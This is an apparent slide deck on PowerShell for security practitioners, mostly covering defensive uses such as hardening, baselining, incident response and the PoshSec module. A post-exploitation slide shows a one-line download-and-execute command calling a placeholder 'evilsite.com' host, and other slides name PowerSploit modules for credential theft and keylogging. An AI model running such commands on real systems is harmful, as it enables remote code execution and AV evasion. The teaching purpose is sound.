Upload
ben-finke
View
85
Download
3
Embed Size (px)
Citation preview
Standing on the Shoulders…
▪ Carlos Perez
▪ Matt Graeber
▪ Chris Campbell
▪ Matt Johnson
▪ Don Jones
▪ Lee Holmes
▪ Wolfgang Goerlich
▪ Rich Cassara
▪ Nick Jacob
▪ Ben Ten
▪ Ed Wilson
▪ Adam Driscoll
▪ And many, many more…..
Powershell – The Beginning
▪ Built into Windows!
▪ Better than Batch and cmd.exe
▪ Objects > Manipulating text output
▪ Powershell Remoting
▪ Did I mention its built into Windows?!
▪ Great documentation, code samples, communities
▪ Best tool for scripting and automating Windows
Levelset
▪ Cmdlet (pronounced like it sounds)
▪ Functions
▪ Scripts
▪ Modules
▪ Object
▪ Method vs Property
▪ Variable
Cmdlet
▪ Not misspelled – a feature!
▪ Powershell commands – implement specific functionality
▪ Verb-Noun pattern
▪ Microsoft and Third-Party cmdlets available
▪ Written in .Net (like C#)
▪ Get-Command
▪ Get-Help
So, where do I write my awesome code?
▪ Powershell ISE
▪ Notepad++
▪ Sublime Text Editor 2
▪ Primal Script ($)
▪ Visual Studio ($ or Community)
▪ You’re totally going to need a Windows computer though…
Powershell ISE
▪ Integrated Scripting Environment
▪ Tab Expansion
▪ Module Search
▪ Context based Help
▪ Demo!
Powershell Remoting – A word of caution
▪ Windows 2012 and newer – default w/ HTTP listener
▪ All others needs to be configured (once WMF is installed)
▪ Kerberos in AD, Basic and NTLM for workgroups
▪ Use HTTPS when available! (need a Windows CA)
▪ CredSSP is an option (especially if you like PtH Attacks)– That was a joke, you don’t.
▪ CredSSP for delegation and multi-hops
Powershell Discovery
▪ Incorporate useful information from other tools– Nmap
– Nessus
▪ Pull info from AD directly– Windows 2008 R2 – 76 cmdlets in AD PS Module
– Windows 2012 – 135 cmdlets
– Windows 2012 R2 – 147 cmdlets
▪ Roll your own scanner with Powershell!
Baseline – Discovery, done repeatedly
▪ A lot of your discovery tasks will end up in your baseline
▪ Script up what you want to know
▪ Put it into some kind of usable text format
▪ Stash it in a versioning repository
▪ What changed between yesterday and today?
Automate Reporting
▪ Need to nicely present Nessus or nmap output?
▪ Previous work– Carlos Perez (DarkOperator) – Posh-NVS
▪ https://github.com/darkoperator/Posh-NVS
▪ Powershell easily handles XML and CSV inputs
[xml]$report = Get-Content –Raw .\scan.nessus
$reporthosts = $report.NessusClientData_v2.Report.ReportHost
$reporthosts | foreach {$_.ReportItem} | Out-GridView
System Hardening
▪ Use Powershell to – Enable windows firewall
– Enable windows update
– Disable Guest account
– Disable autoplay
– Install AV software
– Turn on User Account Control
– Disable Java in IE
Incident Response
▪ Something bad (or maybe bad) is happening
▪ Identify source of unwanted activity
▪ Determine what is occurring
▪ Isolate and Contain
▪ Gather information from isolated system(s)
▪ After Action review
Build Your Own HoneyPot!
▪ Create cmdlet parameter binding
▪ Make sure you’re admin
▪ Build your whitelist
▪ Create a listening port
▪ Any connection – add source IP to firewall
▪ Log the action (for reporting and response)
PoshSec
▪ A Powershell module designed for executing security tasks on Windows systems
▪ Started by Will Steele and Matt Johnson
▪ Github – PoshSec
▪ Blue Team Focused
▪ Provides the platform for scripting and automating your playbook
PoshSec Framework
▪ A framework for Powershell and PoshSec scripts for network management, security, and maintenance
▪ Graphical Framework
PoshSec
▪ Critical Security Controls– (1) Inventory of Authorized and Unauthorized Devices
– (2) Inventory of Authorized and Unauthorized Software
– (11) Limitation and Control of Network Ports, Protocols, and Services
– (12) Controlled Use of Admin Privileges
– (16) Account Monitoring and Control
▪ Baselines
▪ Forensics
▪ Log Management
▪ Software Management
A few helpful hints
▪ Get a code repo – SVN/Git/TFS/whatever
▪ Centralized logging
▪ Prepare BEFORE the Incident
▪ Test your defenses
▪ Test your response
Attacker’s Advantage
“Attack him where he is unprepared, appear where you are not expected.”
-Sun Tzu
*Obligatory Art of War quote
So you’re on this pentest…
▪ You totally exploit that one thing.
▪ And then AV stops every. Single. Thing. You. Try.
▪ Time to Live off the Land!**
** Living off the Land – By Chris Campbell and Matt Graeber
Powershell as a Post Exploitation Tool
▪ Remember what we said about already on the system?
▪ Bypass AV and application whitelisting
▪ Control all aspects of a Windows system
▪ Easy to execute:
Invoke-Expression (New-Object Net.WebClient).DownloadString("http://evilsite.com/code.txt")
PowerSploit
▪ Github project - https://github.com/mattifestation/PowerSploit
▪ Started my Matt Graeber (@mattifestation)
▪ Powershell modules for pentesters
▪ Loads of PS goodness like:
• Invoke-Shellcode• Find-AVSignature• Invoke-TokenManipulation• Invoke-Mimikatz• Get-Keystrokes• Get-TimedScreenshot• Set-MasterBootRecord
• Set-CriticalProcess (BSoD)• Invoke-Portscan• Invoke-ReverseDnsLookup• Get-PEHeader• Get-DLLLoadPath• And lots, lots more!
Seriously Bro, Powershell on a pentest?
▪ Yes, I am quite serious (and don’t call me Bro…)
▪ Ever hear of Deep Panda?– ProTip: Do NOT search for “Deep Panda” on Google Images.
▪ Deep Panda – the APT, not the 80s Metal Band
▪ Maintained persistence with Powershell scripts as scheduled tasks
▪ Moral of the story : Good enough for Deep Panda, good enough for you!
Whatever you are writing, please remember…
▪ Your code will be written once – and read dozens more.
▪ “accountName” is a way better variable than “a”
▪ Comments – use them!
▪ Think modular (or reusable)
▪ Error Catching
▪ Logging
▪ Documentation of your functions
▪ Code Repository